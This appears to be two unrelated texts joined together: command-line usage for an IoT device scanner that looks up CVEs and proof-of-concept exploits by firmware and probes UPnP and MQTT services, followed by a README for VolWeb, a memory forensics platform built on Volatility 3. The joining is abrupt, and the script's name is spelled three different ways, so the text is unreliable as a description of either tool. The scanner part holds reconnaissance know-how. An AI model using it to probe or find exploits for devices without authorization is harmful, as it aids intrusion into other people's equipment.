python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smarthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVE and Poc [ firmware and device type]
Scan device for open upnp ports
python3 smartthings.py -s --scan upnp --id
get data from mqtt 'subscribe'
python3 smartthings.py -s --scan mqtt --id
VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.
The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.
By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.
The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.
[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.
VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.
If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.
Contact me at k1nd0ne@mail.com for any questions regarding this tool.
Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1